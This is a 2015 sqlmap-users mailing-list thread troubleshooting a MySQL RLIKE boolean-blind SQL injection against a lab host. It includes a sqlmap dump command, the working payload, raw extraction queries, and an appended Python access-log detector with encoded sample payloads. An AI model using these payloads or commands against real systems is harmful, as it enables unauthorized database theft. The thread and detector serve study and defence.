Re: [sqlmap-users] Trying to figure out why boolean RLIKE only works sometimes
From: Miroslav S. <mir...@gm...> - 2015-02-22 13:16:12
"I only bring it up because sql map has no problem grabbing the database with rlike but can't enumerate the values from the user table"

$ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1" --batch --test-filter="RLIKE" --dump -D testdb -T users
...
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28 END))
---
...
[14:14:52] [INFO] postprocessing table dump
Database: testdb
Table: users
[5 entries]
+----+--------+-----------------------------------------+
| id | name   | surname                                 |
+----+--------+-----------------------------------------+
| 1  | luther | blissett                                |
| 2  | fluffy | bunny                                   |
| 3  | wu     | ming                                    |
| 4  | NULL   | nameisnull                              |
| 5  | md5    | 098f6bcd4621d373cade4e832627b4f6 (test) |
+----+--------+-----------------------------------------+

On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bpe...@gm...> wrote:

> Right, in the sql statement where I select 'a', the ord of this is not
> greater than 112, and it fails as expected with parens not balanced.
>
> The query below this that selects the first name from users should be
> functionally equivalent to select 'a' as mid is used to select the first
> character of the first username which is 'admin' as shown, but this
> statement does not fail as expected.
>
> I am at a loss as to why the latter does not fail when the inner select is
> functionally equivalent to select 'a', and the former fails as expected.
>
> I only bring it up because sql map has no problem grabbing the database
> with rlike but can't enumerate the values from the user table, and I logged
> into the server as root to try to figure out what the issue might be and
> this seems to be the root cause.
>
> Sent from a phone
>
> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi.
>
> Maybe I've mistaken, but you are looking at this RLIKE wrong. Its function
> here (in your case) is to PROVOKE errors on False, and that's exactly
> what's going on here.
>
> In case of True, RLIKE is called with perfectly valid 0x7474747474, while
> in case of False it's called with erroneous regexp 0x28 ('parentheses not
> balanced').
>
> Bye
>
> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...> wrote:
>
>> Have an injection that I can use RLIKE to induce a 500 error, but it only
>> works in some circumstances. Enumerating the DATABASE() value works, as
>> well as the current user, but enumerating values from the database tables
>> fails. Even as root on the box, the RLIKE query fails to throw an exception
>> when attempting to use RLIKE in some instances.
>>
>> As you can see in the output below, the user can select the first name
>> value from the users table (which is ‘admin’). When using RLIKE to test the
>> first character returned with DATABASE() (a ‘p’), you get the parentheses
>> not balanced exception as expected. You also get this exception when simply
>> selecting ‘a’.
>>
>> But when you select the first row from the users table and grab the first
>> character (an ‘a’), no exception is thrown and an empty result set is
>> returned.
>>
>> Any thoughts?
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
>> 0x7474747474 ELSE 0x28 END));
>> Empty set (0.01 sec)
>>
>> mysql> SELECT `name` from users LIMIT 0,1;
>> +-------+
>> | name  |
>> +-------+
>> | admin |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql>
>>

--
Miroslav Stampar
http://about.me/stamparm
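Added example, not from the thread or from sqlmap itself: a small Python detector that flags the RLIKE ... CASE WHEN ... ELSE 0x28 END payload shape Miroslav describes (valid regexp on True, unbalanced parenthesis on False) in web-server access logs. It assumes Apache combined-format lines; the sample log lines are constructed, and the client IPs and timestamps in them are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Shape of the MySQL RLIKE boolean-blind payload discussed in the thread:
#   <value> RLIKE (SELECT (CASE WHEN (<condition>) THEN <valid regexp> ELSE 0x28 END))
# On False the regexp engine receives a lone '(' (0x28), MySQL raises error 1139
# ('parentheses not balanced') and the application typically answers with a 500.
RLIKE_BLIND = re.compile(
    r"\bRLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN\b.*?\bTHEN\b.*?\bELSE\s+0x28\s+END\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL,
)

# Apache combined-format access log line, reduced to the fields we need.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def scan_access_log(text):
    """Return one finding per request whose query parameter carries the payload."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes the values, so the pattern sees the SQL as MySQL did
        for name, value in parse_qsl(query, keep_blank_values=True):
            if RLIKE_BLIND.search(value):
                findings.append({
                    "client": m.group("client"),
                    "param": name,
                    # a 500 here means the ELSE branch fired: the oracle answered "False"
                    "status": int(m.group("status")),
                })
    return findings

# Constructed sample log lines (not taken from the thread); the first two carry
# the sqlmap-style payload against get_int.php, the last two are benign traffic.
SAMPLE_LOG = """\
192.168.223.1 - - [22/Feb/2015:14:14:50 +0100] "GET /sqlmap/mysql/get_int.php?id=1%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%287668%3D7668%29%20THEN%201%20ELSE%200x28%20END%29%29 HTTP/1.1" 200 512
192.168.223.1 - - [22/Feb/2015:14:14:51 +0100] "GET /sqlmap/mysql/get_int.php?id=1%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%28ORD%28MID%28%28SELECT%20DATABASE%28%29%29%2C1%2C1%29%29%3E112%29%20THEN%200x7474747474%20ELSE%200x28%20END%29%29 HTTP/1.1" 500 0
10.0.0.7 - - [22/Feb/2015:14:15:02 +0100] "GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [22/Feb/2015:14:15:03 +0100] "GET /search.php?q=rlike%20select HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A burst of such requests from one client, with the 500/200 status alternating per character tested, is the footprint of the blind enumeration; fixing the injection (parameterised queries) removes the oracle, and not surfacing database errors as 500s removes the channel.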